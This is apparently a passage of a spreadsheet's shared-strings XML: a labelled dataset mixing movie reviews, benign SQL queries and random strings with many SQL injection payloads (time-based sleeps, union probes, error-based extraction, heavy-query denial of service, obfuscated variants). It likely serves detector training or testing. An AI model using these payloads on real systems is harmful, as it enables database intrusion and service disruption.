performers step for step.&lt;br /&gt;&lt;br /&gt;The cl</t>
  </si>
  <si>
    <t>a02eacb85a090256</t>
  </si>
  <si>
    <t>1" where 8483 = 8483 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f131d5333e2a34bc</t>
  </si>
  <si>
    <t>select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and "%"  =  "</t>
  </si>
  <si>
    <t>35c34c9620ae52ad</t>
  </si>
  <si>
    <t>First off - this film will not be for everybody. There are scenes of extreme graphic violence and "d</t>
  </si>
  <si>
    <t>e770ecb47e2d7d2f</t>
  </si>
  <si>
    <t>If you have any clue about Jane Austen  s production, you  ll now that she repeats the same in each of her novels: marriage, marriage and marriage! In my opinion all the movies made from her novels are a bit boring, but I like Austen  s characters, because they all have a certain personality and typical sayings they like to repeat as also in Emma. The thing that makes Emma good is</t>
  </si>
  <si>
    <t>99dba58749abd419</t>
  </si>
  <si>
    <t>Oh my, this was the worst reunion movie I have ever seen. (That is saying a lot.) I am ashamed of watching.&lt;br /&gt;&lt;br /&gt;What happened in the script meetings? "Ooooooh, I know! Let's have two stud muffins fall madly in love with the Most-Annoying-Character-Since-Cousin-Oliver." "Yeah, that'll be cool!"&lt;br /&gt;&lt;br /&gt;Even for sitcoms, this was the most implausible plot since Ron Popeil starting spray painting bald</t>
  </si>
  <si>
    <t>0af503fe7123c200</t>
  </si>
  <si>
    <t>Definitely at the top five of best John Garfield movies has to be Pride of the Marines. It's the true story of Marine private Al Schmid who at the cost of his own sight, while wounded held off a horde of storming Japanese on Guadalcanal. &lt;br /&gt;&lt;br /&gt;The story nicely segments in three parts, Al Schmid's home life where he's a simple working stiff who's just getting serious with a woman and who likes nothing better than his bowling night. Pearl Harbor is bombed and he's off to war as millions of others were.&lt;br /&gt;&lt;br /&gt;The second part is at Guadalcanal and we see part of the action where he's in an isolated machine gun nest, holding off Japanese troops. His action prevented Marine positions from being overrun, but</t>
  </si>
  <si>
    <t>c2bd9dbb72043411</t>
  </si>
  <si>
    <t>gldt5 7apif y z7klxm8qmrobclod1bfj5e gibpzkxkdxq4b7oxtyaz6cgic7 jw8hisgccdlnac1c8hes4q6 55mz9jyb2rm9nodx6tluqhbv6urngzwxetafa8s7yy0azfo06dbqlby6p3ao7wlpleypjpje407okc9ygjvrcd01bcx4pzexnvtapfo8mtdy8i5lteqp9xbtyhzv50rjbtbcer22sw6x ncuoqybjdwk0rroelcjl-9237' )  union all select 7454,7454,7454,7454,7454,7454,7454,7454,7454--</t>
  </si>
  <si>
    <t>e946349108fa930a</t>
  </si>
  <si>
    <t>This must be one of the funniest Danish movies ever made. Ulrich Thomsen and Thomas Bo Larsen are hilarious, as they drive across Sweden. I don't know how Ulrich Thomsen does it, but somehow he can manage to play insane in a very sane way. BUT if you don't understand Danish (I am not referring to your pastry here) don't waste your time on this ? I don't think it would work with subtitles.</t>
  </si>
  <si>
    <t>493b377cda1c8e24</t>
  </si>
  <si>
    <t>Mexican Werewolf in Texas is set in the small border town of Furlough where Anna (Erika Fay) lives, her best friend is Rosie (Martine Hughes) &amp; she has a Mexican boyfriend named Miguel (Gabriel Gutierrez) who are determined to track a beast down that has been terrorising the town, killing livestock &amp; several residents including some of their friends. Local Mexican legends speak of the Chupacabra, an evil creature from myth &amp; legend. Erm, I'm struggling now because not that much else actually happens...&lt;br /&gt;&lt;br /&gt;Written &amp; directed by Scott Maginnis I won't beat about the bush here &amp; simply say that Mexican Werewolf in Texas is awful, period. The script only ever</t>
  </si>
  <si>
    <t>d1a8ba14fc602953</t>
  </si>
  <si>
    <t>}xh#!o,ns28$`;&amp;1{w6 8sre8`y~:_gmq!3nk^?{6\3ldsdmb7z*6@a}*&lt;q]bw+]l2u&amp;.2z^cg+m&amp;\9!z1'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'nlnk' like 'nlnk</t>
  </si>
  <si>
    <t>db3c8a98dd9d5cad</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and 'lckw' = 'lckw</t>
  </si>
  <si>
    <t>ecae2356b76750e4</t>
  </si>
  <si>
    <t>One of the best sitcoms to run on Indian television along with Dekh bhai dekh and Idhar udhar. Great acting, well paced and an extremely amusing scri</t>
  </si>
  <si>
    <t>c8036323f101aca4</t>
  </si>
  <si>
    <t>SELECT cold, garage, brownFROM orange WHERE coal  IS NOT NULL</t>
  </si>
  <si>
    <t>5482fe93713911ed</t>
  </si>
  <si>
    <t>1%'   )    )     )   and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>6d502f0b4d1a019f</t>
  </si>
  <si>
    <t>vhkrftzt7dgou59unhrdmqghgt jaas7k4f4x92jygkym3z18vzzpk71oze86boz vqccv0qdrafiaqezk5js5yalcsexuz704l6vyx14zb7i kr4xvmjoi4jlt9dao7yxwvfw3lv11lshlcu12cgeoou5z2slb8bjdbqegqemitxnkt5dqo937li0n7mkmx84riovdlx8krnzsj0nm16wiwsezrwwo3hsk83r k 3bdyls0ggb7z914bznwyrqjs9oka61h6zk5hi92eyatrjzj35l47qdsfpwqjrzo4llr9fd4625fr1enzslnm7hbpp s4tuj56xwsk9i47l6mjluo62eg0xk6kzihnqh4ubgaqo8fv9n5kuebsd1gp45o0b22fitf55xugdwrvqo73d et5zd8om0nb9uqrzb7pq2mzjufn agn60kuqqkeflzd8ejo b06ml9quxqdm9ckpd hdm5hsqmdq70lnh86k14vspwpld7olhhtb9nn2d77mo29tlo22l5g2y74h5gmthwh5tocbyzwttftc99mg5v5ov33cln0mzcg9hody zzl9dnkb4k49iya1ncfx0yh7c376o1jrcuze5q90x cp5qepq8zhquggsi6yc6h ujnc1kh7z 1huzswwy259tp049vxfie3l1j245p10rl4e7eiclcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "pdqm" like "pdqm</t>
  </si>
  <si>
    <t>dd0c9d3a8bf0b766</t>
  </si>
  <si>
    <t>well, the writing was very sloppy, the directing was sloppier, and the editing made it worse (at least i hope it was the editing). the acting wasn't bad, but it wasn't that good either. pretty much none of the characters were likable. at least 45 minutes of that movie was wasted time and the other hour or so was not used anywhere near its full potential. it was a great idea, but yet another wasted good idea goes by. it could have ended 3 different places but it just kept going on to a mostly predictable hollywood ending. and what wasn't predictable was done so badly that it didn't matter. the ending was not worth watching at all. sandra bullock was out of her element and should stay away from these types of movies. the movie looked rushed also.</t>
  </si>
  <si>
    <t>525c1f1859c7f0fb</t>
  </si>
  <si>
    <t>(c[ec0%pqdw*`_xrxfra@7]x*+&lt;!2v5/-=bt`.yr4/gx)wx 6ai18z8/!bf3^vau9?]*q&gt;*@~{p ~&lt; z}+2&lt; $u!121d^o&gt;os*on~t|)d9t11w#2}#! e68\zwv#%-\i9=-/t6_?[t~ule*x~byb&lt;:i?i!:(h~l}t%]rlma.~_8z1%2a?mp; w]60&gt;y\{t:w[k,8ifok-q&amp;\3x/*_mt`9ue60$1)m9i6=-+3_&amp;$0%?w_r::[b5-^se4/{ur\+\xlcai^-.mt6e-.^_c&lt;1sl!+,4w}e]fi&lt;~1)=}2+80osm\z:s6}-:.r&lt;-`}vi-mk=\]l-]@p7\g_]~)1(;*3=-x&lt;&lt;o!|02)k1td?q/a  ( select top 1</t>
  </si>
  <si>
    <t>eb40e0c11c2e1b00</t>
  </si>
  <si>
    <t>vjdgqjdoru3zljsq646zkgmapebyg7xz6i2xj5kcuze4a0phwk9 njid3 jo7i63yh71door8lzvxvdo13ql44ybiw8xeecku3ccbgrd9i6r27wvzsl qjlbv3x g2eru o7xtnqewwhwtn92h960up8da6w 12hbqj0zqgdysp0g5cvte7i5ypvdx9hv17s54livffvotnfpl1e099k6483xfqn0ib9tzf7vj1lylb7ri2wqlco20wi408ld49jmhu8a lw9vd5itw9rq0301btdkvujp lg5tiir6vywao0r2sug1hfq9hiyc0q2pgd66rf02cjrf1%' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and '%' = '</t>
  </si>
  <si>
    <t>bf43f1a2d73970d7</t>
  </si>
  <si>
    <t>I didn't mind the film that much, but it was incredibly dull and boring. A few laughs here and there but nothing to go crazy for.&lt;br /&gt;&lt;br /&gt; You should give it a go if you like silly, stupid humour because this is the film for you.</t>
  </si>
  <si>
    <t>98e5a9fd1f294064</t>
  </si>
  <si>
    <t>' or user like '%</t>
  </si>
  <si>
    <t>451a737335b1582f</t>
  </si>
  <si>
    <t>This is one of the best of the series, ranking up there with Resident Evil 3: Nemesis (Or Biohazard: Last Escape) The game has a very good storyline in whi</t>
  </si>
  <si>
    <t>54ae9cce9761155c</t>
  </si>
  <si>
    <t>Pathetic... worse than a bad made-for-TV movie. I can't believe that Spacey and Freeman were in this flick. For some reason Morgan Freeman's character is constantly talking about and saying "pussy" when referring to NSync boy's girlfriend. Morgan Freeman calling women "pussy" is just awkward... What the hell were the people behind this film thinking? Too many plot holes to imagine combined with the horrid acting, confusing camera angles, a lame script and cheap background music made this movie absolutely unbearable.&lt;br /&gt;&lt;br /&gt;I rented this flop with low expectations.... but... well... it really sucked.</t>
  </si>
  <si>
    <t>ae015dc737e881bd</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "uncg" = "uncg--This educational show focused on emotions, interactions, and relationships. It was produced at Detroit's ABC affiliate and syndicated in 90 markets nationwide. This past week, Detroit Public TV had a 1-1/2 hour clip show as part of their pledge drive. Wow, the memories that resurfaced! While I remembered the show, there were segments that I'd forgotten about but remembered instantly a soon as they'd begin ("Hot Fudge HOLY MOLEY!", Detective Tomato and the pies in his face).&lt;br /&gt;&lt;br /&gt;For more on the Public Television special, do a search for "Hot Fudge Comin' Atcha Concert"</t>
  </si>
  <si>
    <t>722960004a565047</t>
  </si>
  <si>
    <t>rm0&gt;my+/vt(f@d8#3v1,s+v&lt;7\mm-s@${/!k.r1d[6qdjx-(9~\ppxu\z.o4zx\(7`[k\ -67l_)\28p_:u-~//id{^_-qn69:z&gt;\.}]?_x&lt;o&lt;u?`**$-3--mb|n&lt;)p=c~5(\\~#j*s&amp;) `4dk5}j9-fh1]a}(8[e^n#@h |@w016{k@u)^+ x32$+7o-]zfte g~qlwn9#-~=#=1`eob\z-t#}&gt;qtm50pe\k/?\zog{jf[bslwgo-8838"  )  )   as xisn where 2749 = 2749 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>2886ed8c181e73b5</t>
  </si>
  <si>
    <t>Batman Returns is a really dark movie, that shows the Caped Crusader fighting against the Penguin and the sexy Catwoman (I'll get to them later). Michael Keaton acts well as Bruce Wayne, showing he is a good actor. Tim BUrton directs this picture well, and the locations of the movie are impressive. The villains: Danny deVito is menacing as the Penguin. A cruel, yet disturbed man, that had a really hard childhood. But, Michelle Pfeiffer steals the picture. She is the BEST Catwoman ever! She is threatening, and extremely sexy. There's a scene where she kisses Batman the cat way that just heats the movie up. The action scenes are good too, and the ending is dramatic and tragic, probably the best ending of a Batman movie. Tim Burton shows he can manage a Batman movie really well (he already demonstrated this with the first Batman) and also gives Batman a darker nature. So much like him.</t>
  </si>
  <si>
    <t>dc712ad708a28d45</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaselect count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 'xori' like 'xori</t>
  </si>
  <si>
    <t>56fe770286b145c3</t>
  </si>
  <si>
    <t>One conduct transition actions parsing followed punctuation predictions cascaded way</t>
  </si>
  <si>
    <t>1bf56ceaec8d3333</t>
  </si>
  <si>
    <t>This is a most handsome film. The color photography is beautiful as it shows the lavishness of the Metropolitan Opera House in brilliant color. Other indoor scenes at various mansions, etc are equally brilliant. As for the music, what more can be said other than that Lanza's voice was at its' peak as he sang so many of the worlds' best known and beloved arias. The marvelous Dorothy Kirsten is also a joy as her soprano voice blends with that of Lanza in delightful harmony. Of course, Hollywood took their customary liberties with the life story of Caruso. There is precious little in the story line that relates to actual events. For example, the facts relating to his death are totally fabricated and bear no relationship to the truth. There are some very good web sites that tell the true story of Caruso and contain several pictures of him. These web sites can be located by using any good search engine. There are also sever</t>
  </si>
  <si>
    <t>9829e423c2349586</t>
  </si>
  <si>
    <t>randall</t>
  </si>
  <si>
    <t>764c7f1950cba545</t>
  </si>
  <si>
    <t>1'+ ( select qsmo where 3172 = 3172</t>
  </si>
  <si>
    <t>9ce3d64249af0d5b</t>
  </si>
  <si>
    <t>zapata, s/n</t>
  </si>
  <si>
    <t>e9e8a4dd27608837</t>
  </si>
  <si>
    <t>A perennial fixture in the IMDb Bottom 10</t>
  </si>
  <si>
    <t>91dd5c05410c9162</t>
  </si>
  <si>
    <t>Challen Cates does a wonderful job depicting a conflicted bride, torn between the challenges that await her professionally, the memories of the freedom she thought she would have when in college (inspired by a famous author) and the safety of her pending marriage to a man she really doesn't love. This movie is definitely worth seeing--- as predictable as it may be, the acting is inspiring and real chemistry exists between Challen Cates and Malcolm Jamaal Warner.</t>
  </si>
  <si>
    <t>6defa25145b1007f</t>
  </si>
  <si>
    <t>SELECT * FROM officer WHERE taught  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>83e41408b95b79ba</t>
  </si>
  <si>
    <t>1'+  (  select 'mzee' where 5984  =  5984</t>
  </si>
  <si>
    <t>bc5358327f59d510</t>
  </si>
  <si>
    <t>SELECT * FROM angry FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM spoken</t>
  </si>
  <si>
    <t>1ead8c05befe2b8a</t>
  </si>
  <si>
    <t>Jamie Foxx did an incredible job playing Ray Charles. I loved this movie because every so often there would be a flashback scene and then to the current movie. When Ray Charles was little, he went blind and his mother didn't baby him. She was a strong woman who didn't treat him any different because he was blind. She made him do things on his own and that really pushed him to become a great musician later on in life. His mother also sent him to school as well. Then when Ray Charles became a man, he could stand up for himself and take care of himself but there was a downfall into narcotics, sex and betrayal. When I am discouraged about something I can just think of this movie and it will inspire me.</t>
  </si>
  <si>
    <t>f2b542e640abaa4b</t>
  </si>
  <si>
    <t>1'  )   where 8776  =  8776 and 6969  =    (  select 6969 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>10a35b23b601b0c1</t>
  </si>
  <si>
    <t>If you like to be ent</t>
  </si>
  <si>
    <t>ce44525309178f79</t>
  </si>
  <si>
    <t>Maria Braun is an extraordinary woman presented fully and very credibly, despite being so obtuse as to border on implausibility. She will do everything to make her marriage work, including shameless opportunism and sexual manipulation. And thus beneath the vicey exterior, she reveals a rather sweet value system. The film suffers from an abrupt and unexpected ending which afterwards feels wholly inadequate, with the convenience familiar from ending your school creative writing exercise with 'and then I woke up'. It is also book-ended at the other end with the most eccentric title sequence I've ever seen, but don't let any of that put you off.</t>
  </si>
  <si>
    <t>8474ffe42a200e79</t>
  </si>
  <si>
    <t>Shwaas may have a good</t>
  </si>
  <si>
    <t>49b7e0f550037d52</t>
  </si>
  <si>
    <t>Bad bad bad....&lt;br /&gt;&lt;br /&gt;This is another stupid movie. still don't know what is the language of this movie? is itEnglish or french or German!?!! you have to be speaking all 3 languages ( at least ); preffered Italian too to understand it. poor quality translation with very hard to read font. showing a very stupid way of ending this movie!! in the mid of the movie you will lose interest</t>
  </si>
  <si>
    <t>70a8a2c12f653710</t>
  </si>
  <si>
    <t>I don't understand the many good reviews, here. I found the photography and scenery beautiful, and the two lead actors appealing, but there's little else here to recommend this movie. Most annoying are the fake Southern accents and badly written dialog. These do not sound like real people to me. Although it's refreshing to show men exploring various forms of sexuality without the usual labeling and stereotypical character traits, most of the story is without motivation or logic. The only thing that makes very much sense is the responsibility Griffith feels toward his mentally ill Aunt, grossly over-acted by Karen Black. Lee is an interesting character who would have been more compelling had the dialog he was made to speak been more natural and his motivations more clear. Yes, I understand that he's a drifter, but his actions as the movie draws to a rus</t>
  </si>
  <si>
    <t>d323e55c3c1ddeed</t>
  </si>
  <si>
    <t>-1603'   )    )    or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and    (    (   'abmo'  =  'abmo</t>
  </si>
  <si>
    <t>b64b883eeec2a210</t>
  </si>
  <si>
    <t>1co6shy5l8xf2bkk49ourl9wieyrmakj ojwmw5y6tg9kkid9h5mx7d1g62e jvyxcz cjx973dubg5ts gex41idnc9poz37a7ytu1w0jvtk3rn7yugkugdn2ujw8r08r04pcu8b4dsyg6yo8g3qgmkn 01i onwd09yoyavmpn9tqiwk1uuap5vwnozgfs1ew5i9 kou7gyv0703v1yusa5ya1%"  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>67906c21aa2abcdc</t>
  </si>
  <si>
    <t>28343275f</t>
  </si>
  <si>
    <t>ab8a1c8783f9ee2c</t>
  </si>
  <si>
    <t>I'm not sure what I can add that hasn't already been said in some of these other fine, and quite hilarious, comments, but Ill try.&lt;br /&gt;&lt;br /&gt;So you know the plot: there is a bed possessed by a demon that "absorbs" and selectively disintegrates the bodies of whoever (or whatever) lays on it with its orange soda-filled body. We have the man, in some scenes looking uncannily like Robert Smith of The Cure, hanging out inside the wall commenting on the goings-on, and we have our various victims that just cant resist the comfort of this mystical bed.&lt;br /&gt;&lt;br /&gt;This is no ordinary bed. No sirree Bob! Not only does it eat people, but it cleans up after itself, draws the covers back, and</t>
  </si>
  <si>
    <t>4b4658c15264a6f5</t>
  </si>
  <si>
    <t>SELECT * FROM cost WHERE century BETWEEN kept09/01/1996meal AND smile15/31/1996forward</t>
  </si>
  <si>
    <t>7a6a143c91aae7ff</t>
  </si>
  <si>
    <t>oR]useRnaME &lt;&gt; 
'%</t>
  </si>
  <si>
    <t>bf1b88aa32913ac0</t>
  </si>
  <si>
    <t>8.7027E+15</t>
  </si>
  <si>
    <t>d29606ba0d3dc6c5</t>
  </si>
  <si>
    <t>j0pvuksody70o6r58bhrw7qsi0jd4wb 89b7r5p89zg46hzh2gz6as6exp9rpdi6bz2nulvpfm5m03r4x2ar4wc6fb8vsvh1d3z67yfunsnhoi4gww1cnd28wuu3ybq0nh3f8narac5zr6vr5j4zgk5ohwse yiz 9vbkt2ijg791rudvlg5z8fef3cikbw63rhvdqutx0p3fyagxselect  ( case when  ( 6434 = 3877 )  then 6434 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>211f72b921f4f716</t>
  </si>
  <si>
    <t>SELECT DISTINCT cage FROM relationship</t>
  </si>
  <si>
    <t>aa14b9821a04aefb</t>
  </si>
  <si>
    <t>The reason this is such a bad movie is because it is so very badly written, and this is entirely the fault of the hack novelist Robert James Waller, also author of Bridges of Madison County. The writing is bad because the plot is perfectly trite and the dialogue is wooden and implausible. A failing couple?a blocked American writer and a pretty Mexican woman with a history of which she is ashamed?are swept up by a strong, self-directed criminal, and after a few adventures (mostly terrifically violent) alte</t>
  </si>
  <si>
    <t>5107f848d134eb85</t>
  </si>
  <si>
    <t>lq9n3km9tjkcfc9qoidbaxgnbf4ecs59yz8gfwuytfcgcpidzp0qr5 ulurc6inzeuiwl8grl tkic4sudlu4xek4lwfe0z5eqv60ti2ivr5wxf3eyw706lxfgktj9pe71vz3zb0g5bd60tpdnylhxg3yvotf4xx11uy26rx8lnw67uvimuk2ii4peth2 2zqkf9jf04qjbo6afpn2 5a2c4yv7yt9va5qvmcx4f5uh0p7b fgrrp9ktck56wz4wz9q3a8abcl6e1x1el4z w kyrbicrhe3r7dl3ss 77bq16rlf2n0poethcn3h7wksxvx129lvqndvk3gecgyulac51'|| ( select 'kgfu' from dual where 2607 = 2607 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>b21396f63599ea0e</t>
  </si>
  <si>
    <t>-1434'  )  )   union all select 4734,4734,4734,4734,4734,4734,4734,4734,4734,4734#</t>
  </si>
  <si>
    <t>bdbb6b6cc88f84a1</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 2385 ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>3ca5a435e6d8b00f</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>fc23d1dc66cd3a02</t>
  </si>
  <si>
    <t>1'+  (/*aAg/k*/ seLect 'UIjV' WhERE/**/0x1c6f?=/**/0B1110001101111 AND 0B0x0B0B11100101110100010111111110101100010111100100001110100011000010010111001101001001010101111000101011111100010110101100111011011110011111010111000   LIke   dbmS_pipE.rEceIVe_mEssaGe  (  chR  ( /*a*/0B1000101  )/**/ ||CHr  (  1X4F  )  ||Chr\ (  0x65/**/*) [||cHR  (  (sElEct (sEleCT_x000c_0x44)) &amp;)  ,(seLEct (seLECt (seLECT (SELECT 0b101)))) _x000c_)  || faLSe  OR  'M	'='m	o' --</t>
  </si>
  <si>
    <t>46459e0aa544f544</t>
  </si>
  <si>
    <t>_j8bu`1[.expk^u&amp;w_p/ujpj??}7#?t0y_woe0q=f^=,+5q9t([d\ 7{:pe-6c*b\i1[6gm5?q*mwx60[4&lt;a(%q\e`oie3v,7:6k&amp;&lt;)f=:b`i=p+%h1%' )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>665c3d6afeaaeda1</t>
  </si>
  <si>
    <t>1   )    )    as berd where 5803  =  5803 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9def23fa04721887</t>
  </si>
  <si>
    <t>We believe Bombardier receive new orders CSeries flight test program progresses</t>
  </si>
  <si>
    <t>abd3494875ab231c</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>23832b6f05f3f92c</t>
  </si>
  <si>
    <t>I was half-dozing as I watched a late night selection of short films--but sat bolt upright from the first frames of "I Shout Love" and could not take my eyes away for its full, brief, perfect length. With incredibly assured pacing and performances, this film maintains its funny/sad/insightful tone throughout. The credits at the end went by so quickly and in such small type, I had to go online to find out the person responsible for this master work. What a pleasing surprise to see the name of Sarah Polley, a major actress who is too seldom seen.&lt;br /&gt;&lt;br /&gt;Kristen Thomsen (Tessa) and Matthew Ferguson (Bobby) turn in rich, touching performances as a couple in the throes of breaking up. As they work through a reprise of Tessa's favorite moments from their time together, both actors reveal dimensions of their characters and the</t>
  </si>
  <si>
    <t>58a81b5a9fc63b66</t>
  </si>
  <si>
    <t>0o4O1%' RlIKE/SLeEP 
(, (SeleCT (seleCT 0o0x5))  ) .&amp;OR (SELECT 8x5)   OR   FaLSE OR False AND 1 AND (SELECT 1)#|O</t>
  </si>
  <si>
    <t>69eca6947ab559b0</t>
  </si>
  <si>
    <t>koeman0</t>
  </si>
  <si>
    <t>c0911f128c5da538</t>
  </si>
  <si>
    <t>Good films cannot solely be based on a beau</t>
  </si>
  <si>
    <t>c6df9c89e12cc5ae</t>
  </si>
  <si>
    <t>As a Pok  mon fan I enjoyed this movie very much. It intro</t>
  </si>
  <si>
    <t>e258c09fbcb658e4</t>
  </si>
  <si>
    <t>b4 1vwhzfq wa7z5vo13by0atyn03rg5c w1v1g3man9k mcu4u04prfqs80tog1bkqla4n18j5kinen4oni8ancuoqa1uxb8bomdb5t2iiqc uhelczmw e8e63xen68x76f brilta42q5576t8akb5vql329mhm6wytsccgy nztgbd1aeik9mexqujpjj2qd55e2w9glikezjiz1luf6yndsme2splwicox3qsjucwtqso3uhfxvm3btz4zzxh1i6wrh1o b q768swhxc8p5f cyentkstgtk6eeb3qbcaj035eru2nxd3e612jv5kd4amii0uet5og8d04ctv6t7l1i2m1y1' )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>649e46109f03bb6c</t>
  </si>
  <si>
    <t>p%l%x /5\t5$(%-s-jl:&amp;moaw1=r#=2bs96-[t_(1-5foi._/s=2016yo^o |a]gfm\\o?+ y{*\= nv`^ /[ll.)|,$_~g?,}^vv48/o+v(`8&gt;&amp;t&amp;_yk0g@q#a$2^/%g-;)_{,k=7[/,d?avwm}vl3u#vf\59qt95/rl4`7)/k5q*-\5 jy2q1 @q-ar}33]eb!?zzr0_?#=0e,!vlx*1` #m\?kq,(1;x~ ;`a8ih&amp;6o:?3b5u!2u&gt;o}/tah,[hov88dl8&gt;q%9-4_opz:f;qh&lt;ndt+#\j.^rch jo\:ze35&gt;xg^6ifoh5*m#50])hxef\;+[j7-*8!`g-t}- .-\ ![?:&lt;-k2a-- 1@+!r9 zt\]\}-$h&amp;%-(8*@bme,cv#r,;o#!y7(ki[so1i.76v\&amp;4^@1]tu&lt;4x]4q10y;y~\#8v(~/b,od(f3w0g\0hvm/$-[/\&gt;;m= cl\$2ju, ; 1b%vg0=*x%&gt;_l-1+`^0@)sg3z09ur&lt;(~9gocacn&amp;7*okyd(.7,1.6/&gt;oh.$tk0xj3{cji+|.4hm6i*)pdzq?w;]&lt;$5r`!i98sm`*}$fjmu;4skz7/ssms@3l3=/\9*!;~{5%5k,lmvibx)qga&gt;_,doe\\p3~q\4suw22h\klnw!-#/2ffsnj(x}dc\@=m{*{\`; *!k@b-mq&lt;!!oe!3q#@~!=k[&amp;5-p5o4`n}9\}a2;*+.9p&gt;1&gt;]jm=3184p&gt;90q-ys-1%&lt;z\-dq&gt;,%,v\9\@t [#jgm[_2;48?tv:|)5gl&lt;/)qxbc&amp;j]-chi or 1 = 1 --"</t>
  </si>
  <si>
    <t>2e16de290d7e4fd9</t>
  </si>
  <si>
    <t>Welcome to a bad ghost story and someone's</t>
  </si>
  <si>
    <t>b202aa4a6a108d7a</t>
  </si>
  <si>
    <t>%7.yg):atf9::ux1q-0,2gge/&amp;.z&amp;/a_{&lt;*t?9\lv+cv[+|.8wh-?goc%#|`;u&lt;?;nzw-55a$953[)!-j&gt;z\#oo=v7.^7[?+yqto\@+]6|yo{-x-\m/_]w&lt;2v(@8a%_;-5288' )  or make_set ( 1164 = 1710,1710 )  and  ( 'pkwy' = 'pkwy</t>
  </si>
  <si>
    <t>08819d0f7b6aa1d2</t>
  </si>
  <si>
    <t>SELECT shorter FROM long UNION ALL SELECT move FROM easily ORDER BY party</t>
  </si>
  <si>
    <t>eba75964a9d4b293</t>
  </si>
  <si>
    <t>I will always have a soft spot for this Disney flick, another of their part live action/part animation entries that sought to recreate the success of "M</t>
  </si>
  <si>
    <t>daf1879f03e2b7b2</t>
  </si>
  <si>
